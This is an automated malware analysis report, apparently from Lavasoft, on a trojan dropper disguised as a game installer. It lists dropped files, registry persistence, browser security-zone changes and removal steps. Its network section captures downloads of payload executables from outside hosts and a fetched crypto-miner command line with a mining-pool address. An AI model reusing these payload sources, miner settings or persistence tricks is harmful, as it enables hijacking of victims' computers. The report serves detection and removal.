Susp_Dropper (Kaspersky), Trojan.Generic.12062800 (AdAware), Installer.Win32.InnoSetup.FD, Trojan.Win32.Iconomon.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, Installer, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 318269f59a3ec04c48cfc6c2e83d7ade
SHA1: 194f14941a999ffeba984cdbf1c6c9633282efd1
SHA256: 60a763315c7441a303cfa97548a8c053a140d61f17e0a7f5eba93ff7a7ac4028
SSDeep: 49152:TWM9mGWuNxrbhV2OGRJ5BaEKSIztVfHNG2i2QCf2U779q5MC/DsLyGd g iV3ZR2:TR/TvVBwzLKdztVfor2QCfTtqctJdZR2
Size: 2753024 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, BorlandDelphiv30, UPolyXv05_v6
Company: end
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
msvs.exe:532
mscorsvw.exe:1912
setup.tmp:1772
%original file name%.exe:1368
updater6.exe:1264
The Trojan injects its code into the following process(es):
setup.tmp:864
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process setup.tmp:864 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\Uninstall_Icon.ico (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\ISMD5.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\Question_Icon.ico (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\en.isl (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\WinTB.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\ISDone.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\ReadMeEn.rtf (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\cancel.ico (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\ru.isl (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\ISLogo.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\ReadMeRu.rtf (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\logo.png (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\Game.ico (601 bytes)
The process setup.tmp:1772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-99IT4.tmp\setup.tmp (22433 bytes)
The process %original file name%.exe:1368 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Adobe\Updater6\updater6.exe (146 bytes)
The process updater6.exe:1264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Intel\Services\msvs.exe (67 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Updater6\services.exe (15021 bytes)
Registry activity
The process msvs.exe:532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DE 55 01 BF 6C 2D D5 27 3F 7C 97 B8 1F BB 7C 7F"
The process mscorsvw.exe:1912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "2340000"
The process setup.tmp:864 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C E6 73 D6 7E BE A8 23 BC 7B B0 4E 43 4A DA 68"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
The process setup.tmp:1772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C 33 C8 F6 74 97 3B 22 80 92 E2 F2 4C 1E AB 9D"
The process %original file name%.exe:1368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 1C E4 94 87 4F D6 3E CC 24 3F B0 96 F6 C8 52"
The process updater6.exe:1264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 E4 95 50 6A 1C A0 6D 14 3F CD E5 48 30 95 10"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data\Intel\Services]
"msvs.exe" = "Local Management Service"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data\Adobe\Updater6]
"SERVICES.EXE" = "services"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Intel(R) Local Management Service" = "%Documents and Settings%\%current user%\Application Data\Intel\Services\msvs.exe"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Dropped PE files
| MD5 | File path |
|---|---|
| 4bfa7fc3abecf01c6581fb87c271cf3e | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Adobe\Updater6\adobeservice.exe |
| 2b1ca2c0679d9452945b204dda2e220d | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Adobe\Updater6\libcurl.dll |
| a9f8f35cc2caf8dba7167b91420a680b | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Adobe\Updater6\libeay32.dll |
| 56295c7afe3f0542d59d12ca955380db | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Adobe\Updater6\libidn-11.dll |
| 9a836696f6c5edbcb42f32e28cf4d28d | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Adobe\Updater6\librtmp.dll |
| 21233827ea5e30fdc086e25b1471a617 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Adobe\Updater6\libssh2.dll |
| 8df023b6765b21cdf937a25d9d8f14e2 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Adobe\Updater6\pdcurses.dll |
| ce931021e18f385f519e945a8a10548e | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Adobe\Updater6\pthreadGC2.dll |
| 26c74203862342d3f274646c872d9d86 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Adobe\Updater6\services.exe |
| 612b2747d39d9ef838ab9eacbc1f6c3a | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Adobe\Updater6\ssleay32.dll |
| 1e2d8f38b32f79db09f475c746a6e6e6 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Adobe\Updater6\updater6.exe |
| e4d7dd0a413519b21621ccb7d1d78fa4 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Adobe\Updater6\zlib1.dll |
| 3d18afda27d21177ae354fd1a1f54353 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Intel\Services\msvs.exe |
| 5577b6590dd37e9217273379bd949ca7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-99IT4.tmp\setup.tmp |
| 34b88e02562a274b786f3e2a2caa4697 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-SQHIE.tmp\ISDone.dll |
| a38c6ba7377ae98ea908db572e9407c9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-SQHIE.tmp\ISLogo.dll |
| cd7bf74954df6fb87efd8a97b9c7c7ad | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-SQHIE.tmp\ISMD5.dll |
| 8dbb3b555333b9350228f5ea4cfd0f9f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-SQHIE.tmp\WinTB.dll |
| 92dc6ef532fbb4a5c3201469a5b5eb63 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-SQHIE.tmp\_isetup\_shfoldr.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
msvs.exe:532
mscorsvw.exe:1912
setup.tmp:1772
%original file name%.exe:1368
updater6.exe:1264 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\Uninstall_Icon.ico (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\ISMD5.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\Question_Icon.ico (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\en.isl (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\WinTB.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\ISDone.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\ReadMeEn.rtf (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\cancel.ico (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\ru.isl (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\ISLogo.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\ReadMeRu.rtf (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\logo.png (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\Game.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-99IT4.tmp\setup.tmp (22433 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Updater6\updater6.exe (146 bytes)
%Documents and Settings%\%current user%\Application Data\Intel\Services\msvs.exe (67 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Updater6\services.exe (15021 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Intel(R) Local Management Service" = "%Documents and Settings%\%current user%\Application Data\Intel\Services\msvs.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: CI Games
Product Name:
Product Version: 3.4.4.6290
Legal Copyright: nik1967, Shegorat, ProFrager
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description:
Comments: This installation was built with Inno Setup.
Language: English
Company Name: CI GamesProduct Name: Product Version: 3.4.4.6290Legal Copyright: nik1967, Shegorat, ProFragerLegal Trademarks: Original Filename: Internal Name: File Version: 1.0.0.0File Description: Comments: This installation was built with Inno Setup.Language: English
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| CODE | 4096 | 31612 | 31744 | 4.46309 | 1e12323dd630a88fb63316b5595bee4d |
| DATA | 36864 | 1056 | 1536 | 2.0504 | e05de3d717118968b1d9a3467f53e324 |
| BSS | 40960 | 1965 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .idata | 45056 | 1902 | 2048 | 3.00343 | 0094297cd60e4d56b7715e263267622b |
| .tls | 49152 | 8 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rdata | 53248 | 24 | 512 | 0.14174 | 9c4fc312281d2d91bc227cd8fe0aa9f1 |
| .reloc | 57344 | 3060 | 3072 | 4.53868 | 55d085fa0ecf1047b1742e17d96e4a2b |
| .rsrc | 61440 | 2713088 | 2713088 | 5.49506 | dc0f4b8277c6d22de09fc4301022daf7 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://dver.worldnet.us/ilmsrad.dat | 94.249.139.6 |
| hxxp://dver.worldnet.us/rad.dat | 94.249.139.6 |
| hxxp://pastebin.com/raw.php?i=AJxjbBcK |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /ilmsrad.dat HTTP/1.0
Host: dver.worldnet.us
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
HTTP/1.1 200 OK
Server: Apache/2
Last-Modified: Thu, 16 Oct 2014 11:12:28 GMT
ETag: "10600-5058852e53f00"
Vary: User-Agent
Content-Length: 67072
Accept-Ranges: bytes
Date: Sat, 06 Dec 2014 13:39:59 GMT
Connection: keep-alive
MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................v....................@..........................`...................@.......................................X..........................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..............................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....X.......X..................@..P.............`......................@..P..................................................................................................................................................................@...StringX.@.............................X.@..........1@..1@..1@..1@..1@..0@..0@..0@..TObject.%H.@....%D.@....%@.@....%<.@....%8.@....%\.@....%4.@....%0.@....%X.@....%,.@....%(.@....%$.@....% .@....%..@....%..@....%..@....%..@....%..@....%..@....%..@....%T.@....%..@....%..@....%l.@....%h.@....%d.@....%..@....%x.@....%t.@....%..@....%..@....%..@....%..@...S........T.q....D$,.t...\$0....D[....%..@....%..@....%..@....%..@....%..@....%..@....%..@....%..@...S......@..;.uYhD...j.......D$..|$..u.3...$.P.D$..
<<< skipped >>>
GET /raw.php?i=AJxjbBcK HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: pastebin.com
Cache-Control: no-cache
Connection: Close
HTTP/1.1 200 OK
Date: Sat, 06 Dec 2014 13:40:07 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Set-Cookie: __cfduid=dd25e1682d98f818dade85a3193187d571417873207; expires=Sun, 06-Dec-15 13:40:07 GMT; path=/; domain=.pastebin.com; HttpOnly
X-Powered-By: PHP/5.5.5
Set-Cookie: cookie_key=1; expires=Sat, 03-Jan-2015 13:40:07 GMT; Max-Age=2419200; path=/; domain=.pastebin.com
Set-Cookie: realuser=1; expires=Sun, 07-Dec-2014 13:40:07 GMT; Max-Age=86400; path=/
Vary: Accept-Encoding
Server: cloudflare-nginx
CF-RAY: 1948e4bc77910773-EWR
<html><body>..<div class='fixed'>-k x11mod -o stratum tcp://stratum1.suchpool.pw:3335 -u lego.1 -p 123 -I 15</div>..</body></html>..
GET /rad.dat HTTP/1.0
Host: dver.worldnet.us
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
HTTP/1.1 200 OK
Server: Apache/2
Last-Modified: Thu, 16 Oct 2014 11:12:33 GMT
ETag: "21fdc4-5058853318a40"
Vary: User-Agent
Content-Length: 2227652
Accept-Ranges: bytes
Date: Sat, 06 Dec 2014 13:40:00 GMT
Connection: keep-alive
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*...KaU.KaU.KaU.3.U.KaU.3.UHKaU.3.U.KaU.K`U)KaU.3.U.KaU.3.U.KaU.3.U.KaU.3.U.KaURich.KaU................PE..L......S............................ .............@..........................p..........................................3............ ..HD..............................................................@............................................text...c........................... ..`.rdata..#P.......R..................@..@.data...............................@....rsrc...HD... ...F..................@..@....................................................................................................................................................................................................................................................................................................................................................................................................B......QV...u...h/...E.............$...E..............E.........L....E...~M...M...N@.rM...M.^d........3..|$..rJ.L$..9RuA.|$..r:.y.au4.y.ru..y.!u(.y..u".y..u..I...u.j......u.j......u.j.X.....j...,.....(....P..U....<....t..E...@....E...0....u..E.....E...E.]....D$.V...F..N.;N.v_.F.SUW.l:C...t.;.v.Ph..B.U..R.........Q...F.......D. .N...;.w...S.6.<.....YY..u.....Q...>_].^.[^...V...L$......P..F..V...^.........j..p..p..R......t.P.[...Y..D$.V...F..N.;N.v`.F.SUW.l:C...t.;.v.Ph..B.U.gQ.........Q...F..~..
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
setup.tmp_1772:
.text
.text
`.itext
`.itext
`.data
`.data
.idata
.idata
.rdata
.rdata
@.rsrc
@.rsrc
ENoMonitorSupportException
ENoMonitorSupportException
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
EVariantBadIndexError
EVariantBadIndexError
Inno Setup Setup Data (5.5.0) (u)
Inno Setup Setup Data (5.5.0) (u)
Inno Setup Messages (5.5.0) (u)
Inno Setup Messages (5.5.0) (u)
oleaut32.dll
oleaut32.dll
advapi32.dll
advapi32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
user32.dll
user32.dll
GetKeyboardType
GetKeyboardType
kernel32.dll
kernel32.dll
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
ExitWindowsEx
ExitWindowsEx
GetWindowsDirectoryW
GetWindowsDirectoryW
GetCPInfo
GetCPInfo
comctl32.dll
comctl32.dll
NNFTP6FaiaB
NNFTP6FaiaB
.YdKA
.YdKA
qLCmd|D
qLCmd|D
lX%CP
lX%CP
0,.xP,`
0,.xP,`
3O?E%C
3O?E%C
KWindows
KWindows
UrlMon
UrlMon
6MsgIDs
6MsgIDs
Msgs
Msgs
name="JR.Inno.Setup"
name="JR.Inno.Setup"
version="1.0.0.0"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
true
true
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
File I/O error %d
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
lzmadecompsmall: %s
LzmaDecode failed (%d)
LzmaDecode failed (%d)
shell32.dll
shell32.dll
/SL5="$%x,%d,%d,
/SL5="$%x,%d,%d,
Invalid file name - %s
Invalid file name - %s
Wed(Monitor support function not initialized
Wed(Monitor support function not initialized
%s (%s, line %d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid variant operation%Invalid variant operation (%s%.8x)
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Operation not supported
External exception %x
External exception %x
Interface not supported
Interface not supported
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
No argument for format '%s'"Variant method calls not supported
I/O error %d
I/O error %d
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid pointer operation
1.0.0.0
1.0.0.0
3.4.4.6290
3.4.4.6290
setup.tmp_864:
.text
.text
`.itext
`.itext
`.data
`.data
.idata
.idata
.rdata
.rdata
@.rsrc
@.rsrc
Windows
Windows
ENoMonitorSupportException
ENoMonitorSupportException
.uvCOu
.uvCOu
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
Uh.OA
Uh.OA
EVariantBadIndexError
EVariantBadIndexError
ssShift
ssShift
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
EInvalidGraphicOperation
EInvalidGraphicOperation
TPent%C
TPent%C
PasswordChar
PasswordChar
OnKeyDown
OnKeyDown
OnKeyPressLkR
OnKeyPressLkR
OnKeyUp
OnKeyUp
ssHorizontal
ssHorizontal
TCustomButton.TButtonStyle
TCustomButton.TButtonStyle
msShiftSelect
msShiftSelect
ArrowKeys
ArrowKeys
THKInvalidKey
THKInvalidKey
THKInvalidKeys
THKInvalidKeys
TCustomHotKey
TCustomHotKey
THotKeyh
THotKeyh
THotKey
THotKey
HotKey
HotKey
InvalidKeys
InvalidKeys
vsReport
vsReport
Uh3%F
Uh3%F
TComboBoxExEnumerator
TComboBoxExEnumerator
EXPORT
EXPORT
TPSExec
TPSExec
TPSRuntimeClassImporterP;U
TPSRuntimeClassImporterP;U
TPSExportedVar
TPSExportedVar
TPSCustomDebugExec
TPSCustomDebugExec
TPSDebugExec
TPSDebugExec
Monochrome
Monochrome
SHORTCUTTOKEY
SHORTCUTTOKEY
AUTOHOTKEYS
AUTOHOTKEYS
RETHINKHOTKEYS
RETHINKHOTKEYS
OnKeyPress
OnKeyPress
t.Htb
t.Htb
1.2.1
1.2.1
TPasswordEdit
TPasswordEdit
TPasswordEditHWL
TPasswordEditHWL
PasswordEdit*
PasswordEdit*
Password
Password
PasswordPage
PasswordPage
PasswordLabel
PasswordLabel
PasswordEdit
PasswordEdit
PasswordEditLabel
PasswordEditLabel
GetPassword
GetPassword
CheckPassword
CheckPassword
IMsg
IMsg
FormKeyDown
FormKeyDown
PasswordCheckHash
PasswordCheckHash
TKeyNameConst
TKeyNameConst
TOutputMsgWizardPage
TOutputMsgWizardPage
TOutputMsgMemoWizardPage
TOutputMsgMemoWizardPage
MsgLabel
MsgLabel
Msg1Label
Msg1Label
Msg2Label
Msg2Label
function CreateOutputMsgPage(const AfterID: Integer; const ACaption, ADescription, AMsg: String): TOutputMsgWizardPage;
function CreateOutputMsgPage(const AfterID: Integer; const ACaption, ADescription, AMsg: String): TOutputMsgWizardPage;
function CreateOutputMsgMemoPage(const AfterID: Integer; const ACaption, ADescription, ASubCaption: String; const AMsg: AnsiString): TOutputMsgMemoWizardPage;
function CreateOutputMsgMemoPage(const AfterID: Integer; const ACaption, ADescription, ASubCaption: String; const AMsg: AnsiString): TOutputMsgMemoWizardPage;
function MsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons: Integer): Integer;
function MsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons: Integer): Integer;
function GetIniString(const Section, Key, Default, Filename: String): String;
function GetIniString(const Section, Key, Default, Filename: String): String;
function GetIniInt(const Section, Key: String; const Default, Min, Max: Longint; const Filename: String): Longint;
function GetIniInt(const Section, Key: String; const Default, Min, Max: Longint; const Filename: String): Longint;
function GetIniBool(const Section, Key: String; const Default: Boolean; const Filename: String): Boolean;
function GetIniBool(const Section, Key: String; const Default: Boolean; const Filename: String): Boolean;
function IniKeyExists(const Section, Key, Filename: String): Boolean;
function IniKeyExists(const Section, Key, Filename: String): Boolean;
function SetIniString(const Section, Key, Value, Filename: String): Boolean;
function SetIniString(const Section, Key, Value, Filename: String): Boolean;
function SetIniInt(const Section, Key: String; const Value: Longint; const Filename: String): Boolean;
function SetIniInt(const Section, Key: String; const Value: Longint; const Filename: String): Boolean;
function SetIniBool(const Section, Key: String; const Value: Boolean; const Filename: String): Boolean;
function SetIniBool(const Section, Key: String; const Value: Boolean; const Filename: String): Boolean;
procedure DeleteIniEntry(const Section, Key, Filename: String);
procedure DeleteIniEntry(const Section, Key, Filename: String);
function GetCmdTail: String;
function GetCmdTail: String;
function StringChangeEx(var S: String; const FromStr, ToStr: String; const SupportDBCS: Boolean): Integer;
function StringChangeEx(var S: String; const FromStr, ToStr: String; const SupportDBCS: Boolean): Integer;
function RegValueExists(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegValueExists(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegQueryStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegQueryStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegQueryMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegQueryMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegDeleteKeyIncludingSubkeys(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegDeleteKeyIncludingSubkeys(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegDeleteKeyIfEmpty(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegDeleteKeyIfEmpty(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegKeyExists(const RootKey: Integer; const SubKeyName: String): Boolean;
function RegKeyExists(const RootKey: Integer; const SubKeyName: String): Boolean;
function RegDeleteValue(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegDeleteValue(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegGetSubkeyNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegGetSubkeyNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegGetValueNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegGetValueNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegQueryDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultDWord: Cardinal): Boolean;
function RegQueryDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultDWord: Cardinal): Boolean;
